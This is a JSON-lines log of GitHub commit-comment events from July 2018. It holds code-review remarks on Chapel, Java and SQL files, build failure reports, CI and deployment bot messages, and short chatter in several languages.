{"id":"7971465980","type":"CommitCommentEvent","actor":{"login":"sunke5616"},"repo":{"name":"akachronix/pubg-lagswitch"},"payload":{"comment":{"id":29722514,"position":null,"line":null,"path":null,"commit_id":"47f04db0b38b38fdd790b8dbe43a3b44b9fc98ff","created_at":"2018-07-16T15:36:53Z","updated_at":"2018-07-16T15:36:53Z","author_association":"NONE","body":"g++: error:  src\\lagg.cpp: No such file or directory\r\ng++: error:  src\\liblog\\liblog.cpp: No such file or directory\r\ng++: error:  src\\lag_switch.cpp: No such file or directory\r\ng++: fatal error: no input file\r\n@akachronix "}},"created_at":"2018-07-16T15:36:53Z"}
{"id":"7971469022","type":"CommitCommentEvent","actor":{"login":"seonyu10"},"repo":{"name":"seonyu10/gallery"},"payload":{"comment":{"id":29722526,"position":null,"line":null,"path":null,"commit_id":"f4884db481c6f931fbe21f4b2a8d76b5bc43cf08","created_at":"2018-07-16T15:37:24Z","updated_at":"2018-07-16T15:37:24Z","author_association":"OWNER","body":"너무나 아름다운 그라디언트입니다"}},"created_at":"2018-07-16T15:37:24Z"}
{"id":"7971469760","type":"CommitCommentEvent","actor":{"login":"KNUMoonju"},"repo":{"name":"SonEunHo/ProgrammingStudy"},"payload":{"comment":{"id":29722527,"position":10,"line":10,"path":"nano/linux_kernel/README.md","commit_id":"e800e3c75f82913e6027bd47ae129beb7be36cec","created_at":"2018-07-16T15:37:31Z","updated_at":"2018-07-16T15:37:31Z","author_association":"COLLABORATOR","body":"화이팅"}},"created_at":"2018-07-16T15:37:31Z"}
{"id":"7971469828","type":"CommitCommentEvent","actor":{"login":"mppf"},"repo":{"name":"avneet14027/Summer-2018"},"payload":{"comment":{"id":29722528,"position":4,"line":4,"path":"radixsort.chpl","commit_id":"ef941a8bc1c773dad4c6e3f3cb511d1bccce20eb","created_at":"2018-07-16T15:37:32Z","updated_at":"2018-07-16T15:37:32Z","author_association":"NONE","body":"We like to indent 2 spaces inside of a function"}},"created_at":"2018-07-16T15:37:32Z"}
{"id":"7971472669","type":"CommitCommentEvent","actor":{"login":"mppf"},"repo":{"name":"avneet14027/Summer-2018"},"payload":{"comment":{"id":29722533,"position":2,"line":2,"path":"radixsort.chpl","commit_id":"ef941a8bc1c773dad4c6e3f3cb511d1bccce20eb","created_at":"2018-07-16T15:38:01Z","updated_at":"2018-07-16T15:38:01Z","author_association":"NONE","body":"I'd normally place a space between `)` and `{` when declaring a function. It doesn't make a huge difference but I find it distracting."}},"created_at":"2018-07-16T15:38:01Z"}
{"id":"7971473001","type":"CommitCommentEvent","actor":{"login":"igorshcheglakov"},"repo":{"name":"jboss-dockerfiles/keycloak"},"payload":{"comment":{"id":29722535,"position":null,"line":null,"path":null,"commit_id":"4a4db6eaf812d8dbad908dd4f5dcbe9a9ef3bc92","created_at":"2018-07-16T15:38:05Z","updated_at":"2018-07-16T15:38:05Z","author_association":"NONE","body":"Hi,  \r\n\r\nI'm having the following issue after the change:\r\n\r\n```bash-script\r\nStep 15/31 : RUN cd /opt/jboss/keycloak && bin/jboss-cli.sh --file=cli/standalone-configuration.cli && rm -rf /opt/jboss/keycloak/standalone/configuration/standalone_xml_history\r\n ---> Running in 3b5023630ca5\r\n15:23:47,550 INFO  [org.jboss.modules] (main) JBoss Modules version 1.6.1.Final\r\n15:23:47,634 INFO  [org.jboss.msc] (main) JBoss MSC version 1.2.7.SP1\r\n15:23:47,763 INFO  [org.jboss.as] (MSC service thread 1-8) WFLYSRV0049: Keycloak 4.0.0.Beta1 (WildFly Core 3.0.8.Final) starting\r\n15:23:49,019 INFO  [org.jboss.as.controller.management-deprecated] (Controller Boot Thread) WFLYCTL0028: Attribute 'security-realm' in the resource at address '/core-service=management/management-interface=http-interface' is deprecated, and may be removed in future version. See the attribute description in the output of the read-resource-description operation to learn more about the deprecation.\r\n15:23:49,094 INFO  [org.wildfly.security] (Controller Boot Thread) ELY00001: WildFly Elytron version 1.1.6.Final\r\n15:23:49,110 INFO  [org.jboss.as.controller.management-deprecated] (Controller Boot Thread) WFLYCTL0028: Attribute 'security-realm' in the resource at address '/subsystem=undertow/server=default-server/https-listener=https' is deprecated, and may be removed in future version. See the attribute description in the output of the read-resource-description operation to learn more about the deprecation.\r\n15:23:49,248 INFO  [org.jboss.as.patching] (MSC service thread 1-1) WFLYPAT0050: Keycloak cumulative patch ID is: base, one-off patches include: none\r\n15:23:49,260 WARN  [org.jboss.as.domain.management.security] (MSC service thread 1-2) WFLYDM0111: Keystore /opt/jboss/keycloak/standalone/configuration/application.keystore not found, it will be auto generated on first use with a self signed certificate for host localhost\r\n15:23:49,493 INFO  [org.jboss.as.server] (Controller Boot Thread) WFLYSRV0212: Resuming server\r\n15:23:49,495 INFO  [org.jboss.as] (Controller Boot Thread) WFLYSRV0025: Keycloak 4.0.0.Beta1 (WildFly Core 3.0.8.Final) started in 1938ms - Started 64 of 78 services (25 services are lazy, passive or on-demand)\r\nThe batch executed successfully\r\nThe batch failed with the following error: : \r\nWFLYCTL0062: Composite operation failed and was rolled back. Steps that failed:\r\nStep: step-2\r\nOperation: /subsystem=undertow/server=default-server/https-listener=default: write-attribute(name=proxy-address-forwarding, value=${env.PROXY_ADDRESS_FORWARDING})\r\nFailure: WFLYCTL0216: Management resource '[\r\n    (\"subsystem\" => \"undertow\"),\r\n    (\"server\" => \"default-server\"),\r\n    (\"https-listener\" => \"default\")\r\n]' not found\r\n\r\n15:23:49,710 INFO  [org.jboss.as] (MSC service thread 1-6) WFLYSRV0050: Keycloak 4.0.0.Beta1 (WildFly Core 3.0.8.Final) stopped in 9ms\r\nThe command '/bin/sh -c cd /opt/jboss/keycloak && bin/jboss-cli.sh --file=cli/standalone-configuration.cli && rm -rf /opt/jboss/keycloak/standalone/configuration/standalone_xml_history' returned a non-zero code: 1\r\n```\r\n\r\nDidn't get into the details, moved back one commit. Just to let you know. Have a good one.\r\n\r\n"}},"created_at":"2018-07-16T15:38:05Z"}
{"id":"7971474040","type":"CommitCommentEvent","actor":{"login":"sponte"},"repo":{"name":"eu-evops/selenium-pom"},"payload":{"comment":{"id":29722537,"position":null,"line":null,"path":null,"commit_id":"d9872339a4da9bdb1d805e1789ea1e81707114e5","created_at":"2018-07-16T15:38:15Z","updated_at":"2018-07-16T15:38:15Z","author_association":"COLLABORATOR","body":"TeamCity Selenium POM / CI [Build 161](https://teamcity.sponte.uk/viewLog.html?buildId=1555&buildTypeId=SeleniumPom_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 59 Build time: 00:06:14"}},"created_at":"2018-07-16T15:38:15Z"}
{"id":"7971475345","type":"CommitCommentEvent","actor":{"login":"164y"},"repo":{"name":"164y/assessment"},"payload":{"comment":{"id":29722539,"position":null,"line":null,"path":null,"commit_id":"1da12bed93e4fecf6e40b367d57d329348bf8eb8","created_at":"2018-07-16T15:38:29Z","updated_at":"2018-07-16T15:38:29Z","author_association":"OWNER","body":"#1 に対応"}},"created_at":"2018-07-16T15:38:29Z"}
{"id":"7971475936","type":"CommitCommentEvent","actor":{"login":"mppf"},"repo":{"name":"avneet14027/Summer-2018"},"payload":{"comment":{"id":29722541,"position":14,"line":14,"path":"radixsort.chpl","commit_id":"ef941a8bc1c773dad4c6e3f3cb511d1bccce20eb","created_at":"2018-07-16T15:38:35Z","updated_at":"2018-07-16T15:38:35Z","author_association":"NONE","body":"Our project uses 2 spaces for indenting inside of a code block like this"}},"created_at":"2018-07-16T15:38:35Z"}
{"id":"7971476753","type":"CommitCommentEvent","actor":{"login":"nikon-petr"},"repo":{"name":"FokinAlex/SpringSimpleApp"},"payload":{"comment":{"id":29722545,"position":55,"line":55,"path":"src/main/resources/schema.sql","commit_id":"b327a84ee45bf46e25ec8cf7673f1756176c6e45","created_at":"2018-07-16T15:38:43Z","updated_at":"2018-07-16T15:38:43Z","author_association":"NONE","body":"Do you need to mix DDL and DML in single file?"}},"created_at":"2018-07-16T15:38:43Z"}
{"id":"7971477877","type":"CommitCommentEvent","actor":{"login":"mppf"},"repo":{"name":"avneet14027/Summer-2018"},"payload":{"comment":{"id":29722547,"position":13,"line":13,"path":"radixsort.chpl","commit_id":"ef941a8bc1c773dad4c6e3f3cb511d1bccce20eb","created_at":"2018-07-16T15:38:54Z","updated_at":"2018-07-16T15:38:54Z","author_association":"NONE","body":"can there be a space before the `{`, just for readability?"}},"created_at":"2018-07-16T15:38:54Z"}
{"id":"7971478420","type":"CommitCommentEvent","actor":{"login":"Norlandia"},"repo":{"name":"green-fox-academy/Norlandia"},"payload":{"comment":{"id":29722550,"position":8,"line":8,"path":"Week-08/day-02/keyup-event/keyup-event.js","commit_id":"cc1b62d3983564f73c424e02272455061c79337f","created_at":"2018-07-16T15:38:59Z","updated_at":"2018-07-16T15:38:59Z","author_association":"COLLABORATOR","body":"yea I would like to know that too..."}},"created_at":"2018-07-16T15:38:59Z"}
{"id":"7971480295","type":"CommitCommentEvent","actor":{"login":"M-Saleh"},"repo":{"name":"MayadaSaleh/Problem-Solving-Practice"},"payload":{"comment":{"id":29722553,"position":23,"line":23,"path":"src/leetcode/TopFrequentElements.java","commit_id":"7aa53894f2674e6498ce33ddb7728627c1dadfc6","created_at":"2018-07-16T15:39:17Z","updated_at":"2018-07-16T15:39:17Z","author_association":"COLLABORATOR","body":"1. We know the list size(we will add only k elements). So let's initialize the list with capacity = k.\r\n=> List<Integer> list = new ArrayList<>(K);\r\nHere java will create list of exactly k elements.\r\n\r\n2. Define the variable just before using it.\r\nNo need to define the variable 'list' here in line 23 and first usage will be in line 49!\r\n"}},"created_at":"2018-07-16T15:39:17Z"}
{"id":"7971481447","type":"CommitCommentEvent","actor":{"login":"McAfeeAdminInstance2"},"repo":{"name":"McAfeeInst2Org1/newrepo"},"payload":{"comment":{"id":29722554,"position":1,"line":null,"path":"1531755566.64/github_test.txt","commit_id":"bb601b4e5060024a2c99085bfd08f6a9de6fe405","created_at":"2018-07-16T15:39:29Z","updated_at":"2018-07-16T15:39:29Z","author_association":"CONTRIBUTOR","body":"889976543"}},"created_at":"2018-07-16T15:39:29Z"}
{"id":"7971486833","type":"CommitCommentEvent","actor":{"login":"heavysink"},"repo":{"name":"archlinuxcn/repo"},"payload":{"comment":{"id":29722560,"position":null,"line":null,"path":null,"commit_id":"629628c38d75886a207fc7cc4a49125842bcd5c4","created_at":"2018-07-16T15:40:22Z","updated_at":"2018-07-16T15:40:22Z","author_association":"CONTRIBUTOR","body":"@lilydjwg 我知道这样很蠢...但是AUR已经过期很久了，release更新的速度飞快，直接编译又会出现无法运行的问题，所以按照原来AUR上的直接以rpm包作为src的做法（见https://aur.archlinux.org/cgit/aur.git/tree/PKGBUILD?h=iease-music），我想先通过原github上的源码获得最新的pkgver，通过pkgver下载对应的rpm包进行解压..."}},"created_at":"2018-07-16T15:40:22Z"}
{"id":"7971490362","type":"CommitCommentEvent","actor":{"login":"Norlandia"},"repo":{"name":"green-fox-academy/Norlandia"},"payload":{"comment":{"id":29722569,"position":null,"line":null,"path":null,"commit_id":"6242f936730bcc7657a41a33ed27f3a3810335c5","created_at":"2018-07-16T15:40:57Z","updated_at":"2018-07-16T15:40:57Z","author_association":"COLLABORATOR","body":"when i press command shift F to fix it all my single quotes have changed to double quotes ... VS code pff"}},"created_at":"2018-07-16T15:40:57Z"}
{"id":"7971492749","type":"CommitCommentEvent","actor":{"login":"M-Saleh"},"repo":{"name":"MayadaSaleh/Problem-Solving-Practice"},"payload":{"comment":{"id":29722572,"position":30,"line":30,"path":"src/leetcode/TopFrequentElements.java","commit_id":"7aa53894f2674e6498ce33ddb7728627c1dadfc6","created_at":"2018-07-16T15:41:22Z","updated_at":"2018-07-16T15:41:22Z","author_association":"COLLABORATOR","body":"Use Map.'containsKey' method instead of comparing will null. In some situation we may add key = null then this condition will fail!\r\n"}},"created_at":"2018-07-16T15:41:22Z"}
{"id":"7971497352","type":"CommitCommentEvent","actor":{"login":"M-Saleh"},"repo":{"name":"MayadaSaleh/Problem-Solving-Practice"},"payload":{"comment":{"id":29722577,"position":35,"line":35,"path":"src/leetcode/TopFrequentElements.java","commit_id":"7aa53894f2674e6498ce33ddb7728627c1dadfc6","created_at":"2018-07-16T15:42:10Z","updated_at":"2018-07-16T15:42:10Z","author_association":"COLLABORATOR","body":"No need to remove! put method will overwrite old value."}},"created_at":"2018-07-16T15:42:10Z"}
{"id":"7971498020","type":"CommitCommentEvent","actor":{"login":"ncopa"},"repo":{"name":"alpinelinux/aports"},"payload":{"comment":{"id":29722578,"position":null,"line":null,"path":null,"commit_id":"b8d6bb0171bcb609a8d839be9ca8cc24c65726c8","created_at":"2018-07-16T15:42:16Z","updated_at":"2018-07-16T15:42:16Z","author_association":"CONTRIBUTOR","body":"It was unintentional, a mistake. Sorry.\r\n\r\nAre you trying to harass me?"}},"created_at":"2018-07-16T15:42:16Z"}
{"id":"7971500308","type":"CommitCommentEvent","actor":{"login":"MageSlayer"},"repo":{"name":"MageSlayer/paludis-gentoo-patches"},"payload":{"comment":{"id":29722584,"position":5,"line":323,"path":"CMakeLists.txt","commit_id":"0902becf070f15dfb98af8729182da989754704d","created_at":"2018-07-16T15:42:39Z","updated_at":"2018-07-16T15:42:39Z","author_association":"OWNER","body":"Are you sure that current cmake will stop working with boost-1.66 and cmake-3.12?"}},"created_at":"2018-07-16T15:42:39Z"}
{"id":"7971502229","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29722588,"position":null,"line":null,"path":null,"commit_id":"bac6202fac5fbe1e50ee5b50d6c455141b92e661","created_at":"2018-07-16T15:42:58Z","updated_at":"2018-07-16T15:42:58Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#pr-46](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#pr-46).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-46-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-16T15:42:58Z"}
{"id":"7971502459","type":"CommitCommentEvent","actor":{"login":"M-Saleh"},"repo":{"name":"MayadaSaleh/Problem-Solving-Practice"},"payload":{"comment":{"id":29722589,"position":41,"line":41,"path":"src/leetcode/TopFrequentElements.java","commit_id":"7aa53894f2674e6498ce33ddb7728627c1dadfc6","created_at":"2018-07-16T15:43:01Z","updated_at":"2018-07-16T15:43:01Z","author_association":"COLLABORATOR","body":"occurrence not occurance :P "}},"created_at":"2018-07-16T15:43:01Z"}
{"id":"7971503343","type":"CommitCommentEvent","actor":{"login":"ssw3r"},"repo":{"name":"ssw3r/pantheon-give-to-uva"},"payload":{"comment":{"id":29722590,"position":null,"line":null,"path":null,"commit_id":"2a3d09bf095d5c05e81d8837bdc273d183054953","created_at":"2018-07-16T15:43:10Z","updated_at":"2018-07-16T15:43:10Z","author_association":"OWNER","body":"Created multidev environment [pantheon-give-to-uva#ci-13](https://dashboard.pantheon.io/sites/b74c531d-f25b-4a5a-8aca-813c48288835#ci-13).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-13-pantheon-give-to-uva.pantheonsite.io/)"}},"created_at":"2018-07-16T15:43:10Z"}
{"id":"7971506500","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29722594,"position":null,"line":null,"path":null,"commit_id":"2faef250227e996895aacca5fa62e90d17602a7a","created_at":"2018-07-16T15:43:42Z","updated_at":"2018-07-16T15:43:42Z","author_association":"NONE","body":"#6517-MissingEqNumRefsInEngrgRef (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2982 of 2982 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2faef250227e996895aacca5fa62e90d17602a7a-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2faef250227e996895aacca5fa62e90d17602a7a-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-16T15:43:42Z"}
{"id":"7971514028","type":"CommitCommentEvent","actor":{"login":"joesinghaus"},"repo":{"name":"Karlinator/roll20-character-sheets"},"payload":{"comment":{"id":29722603,"position":7,"line":44,"path":"Stars_Without_Number_Revised/ReadMe.md","commit_id":"ab42279b89d1033c9c59ac924a7a275d7175a8b1","created_at":"2018-07-16T15:44:57Z","updated_at":"2018-07-16T15:44:57Z","author_association":"COLLABORATOR","body":"Doh, you're right"}},"created_at":"2018-07-16T15:44:57Z"}
{"id":"7971515304","type":"CommitCommentEvent","actor":{"login":"rbomhof"},"repo":{"name":"rbomhof/irc-d8-workflow"},"payload":{"comment":{"id":29722605,"position":null,"line":null,"path":null,"commit_id":"3af6147dcad5026712b77205a7f88decf70699ee","created_at":"2018-07-16T15:45:11Z","updated_at":"2018-07-16T15:45:11Z","author_association":"OWNER","body":"Created multidev environment [irc-d8-workflow#master-test](https://dashboard.pantheon.io/sites/0c518be8-4ef1-48d0-bf17-f9310a806c4d#master-test).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://master-test-irc-d8-workflow.pantheonsite.io/)"}},"created_at":"2018-07-16T15:45:11Z"}
{"id":"7971518696","type":"CommitCommentEvent","actor":{"login":"jeremycline"},"repo":{"name":"jeremycline/fedora-messaging"},"payload":{"comment":{"id":29722614,"position":null,"line":null,"path":null,"commit_id":"e57cde8412fd99c5d62579dc959cd01edbfaafd4","created_at":"2018-07-16T15:45:43Z","updated_at":"2018-07-16T15:45:43Z","author_association":"OWNER","body":"We moved fedora-messaging to https://github.com/fedora-infra/fedora-messaging. In retrospect I should have renamed my fork to something else so redirects from jeremycline/fedora-messaging worked."}},"created_at":"2018-07-16T15:45:43Z"}
{"id":"7971519421","type":"CommitCommentEvent","actor":{"login":"gokhanettin"},"repo":{"name":"yunusem/pardus-store"},"payload":{"comment":{"id":29722617,"position":4,"line":3,"path":"README.md","commit_id":"8b2e666d62f684def61159c64ad6e3d4bdf5ee73","created_at":"2018-07-16T15:45:50Z","updated_at":"2018-07-16T15:45:50Z","author_association":"COLLABORATOR","body":"Pardus Store is strictly a debian application store for the time being. This line is slightly misleading."}},"created_at":"2018-07-16T15:45:50Z"}
{"id":"7971521013","type":"CommitCommentEvent","actor":{"login":"DaynaMarie07"},"repo":{"name":"DaynaMarie07/Project3-iou-app"},"payload":{"comment":{"id":29722620,"position":null,"line":null,"path":null,"commit_id":"5e6c2e101008785292bd2afff2dc3168fb9dce7b","created_at":"2018-07-16T15:46:07Z","updated_at":"2018-07-16T15:46:07Z","author_association":"OWNER","body":"Awesome job\r\n"}},"created_at":"2018-07-16T15:46:07Z"}
{"id":"7971521339","type":"CommitCommentEvent","actor":{"login":"smoser"},"repo":{"name":"CanonicalLtd/curtin"},"payload":{"comment":{"id":29722621,"position":null,"line":null,"path":null,"commit_id":"a909966f9c235282267024e86adf404dab83ccfe","created_at":"2018-07-16T15:46:10Z","updated_at":"2018-07-16T15:46:10Z","author_association":"CONTRIBUTOR","body":"The problem with using dd is that it is slow.\r\nhttps://bugs.launchpad.net/curtin/+bug/1482994\r\n\r\nIsn't it arguably a filesystem bug if fallocate succeeds on a filesystem that doesn't propertly support it?\r\n\r\nwe've not seen any issues with this on ext4 to my knowledge and I'd expect that we'd see some.\r\nIts unfortunate if the logic to create a swap file has to know the filesystem type that it is creating it on, but I'd prefer that to always being slow. Even on a fairly high end nvme disk I see `$ time dd if=/dev/zero of=/srv/smoser/my.zero bs=1M count=$((1024*8))` writing at < 500MB/s (took 18 seconds for the full 8G).\r\n"}},"created_at":"2018-07-16T15:46:10Z"}
{"id":"7971526371","type":"CommitCommentEvent","actor":{"login":"vishnuk7"},"repo":{"name":"vishnuk7/Laravel-Blog"},"payload":{"comment":{"id":29722629,"position":null,"line":null,"path":null,"commit_id":"9f8503f4c38ca8403a0c2322d775362dcf676933","created_at":"2018-07-16T15:47:01Z","updated_at":"2018-07-16T15:47:01Z","author_association":"OWNER","body":"And I also added code for slug"}},"created_at":"2018-07-16T15:47:01Z"}
{"id":"7971527739","type":"CommitCommentEvent","actor":{"login":"derhuerst"},"repo":{"name":"aledjones/db-rest"},"payload":{"comment":{"id":29722634,"position":17,"line":32,"path":"readme.md","commit_id":"5d445e9a4e96c8773a83ce3e5e2feb3be580fee9","created_at":"2018-07-16T15:47:15Z","updated_at":"2018-07-16T15:47:15Z","author_association":"NONE","body":"Why not do this in the upstream repo? Would happily let a CI service build Docker images!"}},"created_at":"2018-07-16T15:47:15Z"}
{"id":"7971528629","type":"CommitCommentEvent","actor":{"login":"MageSlayer"},"repo":{"name":"MageSlayer/paludis-gentoo-patches"},"payload":{"comment":{"id":29722635,"position":null,"line":null,"path":null,"commit_id":"0902becf070f15dfb98af8729182da989754704d","created_at":"2018-07-16T15:47:25Z","updated_at":"2018-07-16T15:47:25Z","author_association":"OWNER","body":"Ok.\r\nI've commented in http://paludis.exherbo.org/trac/ticket/1369"}},"created_at":"2018-07-16T15:47:25Z"}
{"id":"7971530612","type":"CommitCommentEvent","actor":{"login":"M-Saleh"},"repo":{"name":"MayadaSaleh/Problem-Solving-Practice"},"payload":{"comment":{"id":29722642,"position":45,"line":45,"path":"src/leetcode/TopFrequentElements.java","commit_id":"7aa53894f2674e6498ce33ddb7728627c1dadfc6","created_at":"2018-07-16T15:47:46Z","updated_at":"2018-07-16T15:47:46Z","author_association":"COLLABORATOR","body":"This line is not readable easily, let's rewrite this code in multiple lines!"}},"created_at":"2018-07-16T15:47:46Z"}
{"id":"7971531323","type":"CommitCommentEvent","actor":{"login":"IMintern"},"repo":{"name":"IMintern/notAnExam"},"payload":{"comment":{"id":29722645,"position":1,"line":1,"path":"ninja","commit_id":"63b831fe74505ba35595b1090dc5bcf102f2a3a9","created_at":"2018-07-16T15:47:52Z","updated_at":"2018-07-16T15:47:52Z","author_association":"OWNER","body":"_Hello_"}},"created_at":"2018-07-16T15:47:52Z"}
{"id":"7971533149","type":"CommitCommentEvent","actor":{"login":"igorshcheglakov"},"repo":{"name":"jboss-dockerfiles/keycloak"},"payload":{"comment":{"id":29722648,"position":null,"line":null,"path":null,"commit_id":"4a4db6eaf812d8dbad908dd4f5dcbe9a9ef3bc92","created_at":"2018-07-16T15:48:11Z","updated_at":"2018-07-16T15:48:11Z","author_association":"NONE","body":"Keycloak version 4.0.0.Beta1. Maybe thats the issue. Why would I use beta anyway. Nevermind."}},"created_at":"2018-07-16T15:48:11Z"}
{"id":"7971533761","type":"CommitCommentEvent","actor":{"login":"AlexLeka98"},"repo":{"name":"AlexLeka98/firstRepository"},"payload":{"comment":{"id":29722649,"position":4,"line":5,"path":"charles_dickens.txt","commit_id":"6c892ac47a791d9fef5f751503b63fcb00d27538","created_at":"2018-07-16T15:48:17Z","updated_at":"2018-07-16T15:48:17Z","author_association":"OWNER","body":"LOL nice\r\n"}},"created_at":"2018-07-16T15:48:17Z"}
{"id":"7971535095","type":"CommitCommentEvent","actor":{"login":"trivita"},"repo":{"name":"topjohnwu/MagiskManager"},"payload":{"comment":{"id":29722650,"position":null,"line":null,"path":null,"commit_id":"831112abd2d7fd3df0b1680d1c73c458512e7745","created_at":"2018-07-16T15:48:30Z","updated_at":"2018-07-16T15:48:30Z","author_association":"NONE","body":"im also wondering abt this."}},"created_at":"2018-07-16T15:48:30Z"}
{"id":"7971535351","type":"CommitCommentEvent","actor":{"login":"lilydjwg"},"repo":{"name":"archlinuxcn/repo"},"payload":{"comment":{"id":29722651,"position":null,"line":null,"path":null,"commit_id":"629628c38d75886a207fc7cc4a49125842bcd5c4","created_at":"2018-07-16T15:48:32Z","updated_at":"2018-07-16T15:48:32Z","author_association":"MEMBER","body":"新版本号可以在 pre_build 里填入，比如\r\n\r\n```py\r\ndef pre_build():\r\n  update_pkgver_and_pkgrel(_G.newver.lstrip('v'))\r\n```"}},"created_at":"2018-07-16T15:48:32Z"}
{"id":"7971538225","type":"CommitCommentEvent","actor":{"login":"zstadler"},"repo":{"name":"angular/angular-cli"},"payload":{"comment":{"id":29722656,"position":99,"line":99,"path":"packages/angular_devkit/core/src/terminal/caps.ts","commit_id":"44086c60ff1d6c26d30850bef125120f6c498ac1","created_at":"2018-07-16T15:49:02Z","updated_at":"2018-07-16T15:49:02Z","author_association":"NONE","body":"It looks like setting of the CI environment variable is ignored on Windows platforms.\r\n\r\nI suggest lines 84-99 will be moved after line 107."}},"created_at":"2018-07-16T15:49:02Z"}
{"id":"7971539337","type":"CommitCommentEvent","actor":{"login":"buhaqiqat"},"repo":{"name":"buhaqiqat/buhaqiqat.github.io"},"payload":{"comment":{"id":29722657,"position":null,"line":null,"path":null,"commit_id":"7c14b5a6e799e04cf71a66f56d542e2863f3ada3","created_at":"2018-07-16T15:49:14Z","updated_at":"2018-07-16T15:49:14Z","author_association":"OWNER","body":"initial commit\r\n"}},"created_at":"2018-07-16T15:49:14Z"}
{"id":"7971544477","type":"CommitCommentEvent","actor":{"login":"shanegramlich"},"repo":{"name":"stinb/gitahead-test"},"payload":{"comment":{"id":29722665,"position":1,"line":4,"path":"test","commit_id":"a0bad38889e50aaad137aa0814bc5d66e29aed58","created_at":"2018-07-16T15:50:06Z","updated_at":"2018-07-16T15:50:06Z","author_association":"CONTRIBUTOR","body":"Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor. Aenean massa. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Donec quam felis, ultricies nec, pellentesque eu, pretium quis, sem. Nulla consequat massa quis enim. Donec pede justo, fringilla vel, aliquet nec, vulputate eget, arcu. In enim justo, rhoncus ut, imperdiet a, venenatis vitae, justo. Nullam dictum felis eu pede mollis pretium. Integer tincidunt. Cras dapibus. Vivamus elementum semper nisi. Aenean vulputate eleifend tellus. Aenean leo ligula, porttitor eu, consequat vitae, eleifend ac, enim. Aliquam lorem ante, dapibus in, viverra quis, feugiat a, tellus. Phasellus viverra nulla ut metus varius laoreet. Quisque rutrum. Aenean imperdiet. Etiam ultricies nisi vel augue. Curabitur ullamcorper ultricies nisi. Nam eget dui. Etiam rhoncus. Maecenas tempus, tellus eget condimentum rhoncus, sem quam semper libero, sit amet adipiscing sem neque sed ipsum. Nam quam nunc, blandit vel, luctus pulvinar, hendrerit id, lorem. Maecenas nec odio et ante tincidunt tempus. Donec vitae sapien ut libero venenatis faucibus. Nullam quis ante. Etiam sit amet orci eget eros faucibus tincidunt. Duis leo. Sed fringilla mauris sit amet nibh. Donec sodales sagittis magna. Sed consequat, leo eget bibendum sodales, augue velit cursus nunc,"}},"created_at":"2018-07-16T15:50:06Z"}
{"id":"7971544528","type":"CommitCommentEvent","actor":{"login":"furqanbaqai"},"repo":{"name":"furqanbaqai/Remittance"},"payload":{"comment":{"id":29722666,"position":101,"line":71,"path":"contracts/Remittance.sol","commit_id":"a2dfdb2598dbdf1a19f54c4584ea38bc9300d3f5","created_at":"2018-07-16T15:50:07Z","updated_at":"2018-07-16T15:50:07Z","author_association":"OWNER","body":"True Sir. But I beleive that this case can be handled off-chain. What we can do is to recycle the password OR otpx and create a new password in-case transaction is failed and false OR exception is returned. This can be easily handled by hooking up with external two-factor authentication systems like Vasco and other.  By the way my assumption is that if transaction is fails, accounting entry will not happen. Appreciate your comment on it."}},"created_at":"2018-07-16T15:50:07Z"}
{"id":"7971545703","type":"CommitCommentEvent","actor":{"login":"shanegramlich"},"repo":{"name":"stinb/gitahead-test"},"payload":{"comment":{"id":29722667,"position":1,"line":4,"path":"test","commit_id":"a0bad38889e50aaad137aa0814bc5d66e29aed58","created_at":"2018-07-16T15:50:17Z","updated_at":"2018-07-16T15:50:17Z","author_association":"CONTRIBUTOR","body":"Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor. Aenean massa. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Donec quam felis, ultricies nec, pellentesque eu, pretium quis, sem. Nulla consequat massa quis enim. Donec pede justo, fringilla vel, aliquet nec, vulputate eget, arcu. In enim justo, rhoncus ut, imperdiet a, venenatis vitae, justo. Nullam dictum felis eu pede mollis pretium. Integer tincidunt. Cras dapibus. Vivamus elementum semper nisi. Aenean vulputate eleifend tellus. Aenean leo ligula, porttitor eu, consequat vitae, eleifend ac, enim. Aliquam lorem ante, dapibus in, viverra quis, feugiat a, tellus. Phasellus viverra nulla ut metus varius laoreet. Quisque rutrum. Aenean imperdiet. Etiam ultricies nisi vel augue. Curabitur ullamcorper ultricies nisi. Nam eget dui. Etiam rhoncus. Maecenas tempus, tellus eget condimentum rhoncus, sem quam semper libero, sit amet adipiscing sem neque sed ipsum. Nam quam nunc, blandit vel, luctus pulvinar, hendrerit id, lorem. Maecenas nec odio et ante tincidunt tempus. Donec vitae sapien ut libero venenatis faucibus. Nullam quis ante. Etiam sit amet orci eget eros faucibus tincidunt. Duis leo. Sed fringilla mauris sit amet nibh. Donec sodales sagittis magna. Sed consequat, leo eget bibendum sodales, augue velit cursus nunc,"}},"created_at":"2018-07-16T15:50:17Z"}
